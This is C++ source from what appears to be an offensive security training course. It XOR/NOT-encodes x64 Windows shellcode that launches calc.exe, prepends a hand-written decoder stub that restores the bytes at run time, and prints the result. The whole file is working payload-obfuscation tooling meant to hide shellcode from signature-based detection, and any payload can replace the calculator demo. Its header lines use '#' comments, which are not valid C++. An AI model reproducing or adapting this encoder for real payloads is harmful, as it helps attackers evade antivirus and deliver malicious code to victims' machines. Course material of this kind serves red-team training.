# White Knight Labs
# Offensive Development Course - Shellcode Decoder Stub
# Author: Stigs
#include <iostream>
#include <vector>
#include <iomanip>
#include <random>
// Modified function to apply obfuscation on shellcode using a dynamic XOR value
void obfuscateBytes(std::vector<char>& data, unsigned char randomXorValue) {
for (char& byte : data) {
byte = ~((byte ^ randomXorValue) + 1);
}
}
int main() {
std::random_device rd; // Obtain a random number from hardware
std::mt19937 gen(rd()); // Seed the generator
std::uniform_int_distribution<> distr(0, 0xFF); // Updated range to 0x00 to 0xFF
// Generate a random hexadecimal value within the specified range
unsigned char randomHexValue = static_cast<unsigned char>(distr(gen));
// Shellcode Link - Calc - https://www.exploit-db.com/exploits/51634
std::vector<char> shellcode = {
'\x48', '\x31', '\xd2', '\x65', '\x48', '\x8b', '\x42', '\x60', '\x48', '\x8b', '\x70', '\x18', '\x48', '\x8b', '\x76', '\x20',
'\x4c', '\x8b', '\x0e', '\x4d', '\x8b', '\x09', '\x4d', '\x8b', '\x49', '\x20', '\xeb', '\x63', '\x41', '\x8b', '\x49', '\x3c',
'\x4d', '\x31', '\xff', '\x41', '\xb7', '\x88', '\x4d', '\x01', '\xcf', '\x49', '\x01', '\xcf', '\x45', '\x8b', '\x3f', '\x4d',
'\x01', '\xcf', '\x41', '\x8b', '\x4f', '\x18', '\x45', '\x8b', '\x77', '\x20', '\x4d', '\x01', '\xce', '\xe3', '\x3f', '\xff',
'\xc9', '\x48', '\x31', '\xf6', '\x41', '\x8b', '\x34', '\x8e', '\x4c', '\x01', '\xce', '\x48', '\x31', '\xc0', '\x48', '\x31',
'\xd2', '\xfc', '\xac', '\x84', '\xc0', '\x74', '\x07', '\xc1', '\xca', '\x0d', '\x01', '\xc2', '\xeb', '\xf4', '\x44', '\x39',
'\xc2', '\x75', '\xda', '\x45', '\x8b', '\x57', '\x24', '\x4d', '\x01', '\xca', '\x41', '\x0f', '\xb7', '\x0c', '\x4a', '\x45',
'\x8b', '\x5f', '\x1c', '\x4d', '\x01', '\xcb', '\x41', '\x8b', '\x04', '\x8b', '\x4c', '\x01', '\xc8', '\xc3', '\xc3', '\x41',
'\xb8', '\x98', '\xfe', '\x8a', '\x0e', '\xe8', '\x92', '\xff', '\xff', '\xff', '\x48', '\x31', '\xc9', '\x51', '\x48', '\xb9',
'\x63', '\x61', '\x6c', '\x63', '\x2e', '\x65', '\x78', '\x65', '\x51', '\x48', '\x8d', '\x0c', '\x24', '\x48', '\x31', '\xd2',
'\x48', '\xff', '\xc2', '\x48', '\x83', '\xec', '\x28', '\xff', '\xd0'
};
// Apply obfuscation to the shellcode using the random value
obfuscateBytes(shellcode, randomHexValue);
// Shellcode size for dynamically updating the decoder stub
size_t shellcodeSize = shellcode.size();
// Decoder stub with a placeholder for shellcode size
std::vector<char> decoderStub = {
// '\xcc', // INT 3 - Breakpoint - Uncomment if needed
'\xbe', // Moving to next byte for size placeholder
static_cast<char>(shellcodeSize & 0xFF), // Least significant byte (LSB) of the size
static_cast<char>((shellcodeSize >> 8) & 0xFF),
static_cast<char>((shellcodeSize >> 16) & 0xFF),
static_cast<char>((shellcodeSize >> 24) & 0xFF), // Most significant byte (MSB) of the size
// The rest of the decoder stub instructions
'\x48', '\x8d', '\x3d', '\x16', '\x00', '\x00', '\x00',
'\x48', '\x85', '\xf6', '\x74', '\x11',
'\x48', '\xff', '\xce', '\x8a', '\x04', '\x37', '\xf6',
'\xd0', '\xfe', '\xc8', '\x34', static_cast<char>(randomHexValue), '\x88', '\x04',
'\x37', '\xeb', '\xea',
};
// Combine the decoder stub with the obfuscated shellcode
std::vector<char> combinedData = decoderStub;
combinedData.insert(combinedData.end(), shellcode.begin(), shellcode.end());
// Print the obfuscated shellcode with the decoder stub
std::cout << "Obfuscated Shellcode with Decoder Stub: ";
for (const char& byte : combinedData) {
std::cout << "\\x" << std::hex << std::setw(2) << std::setfill('0') << (0xFF & static_cast<int>(byte));
}
std::cout << std::endl;
return 0;
}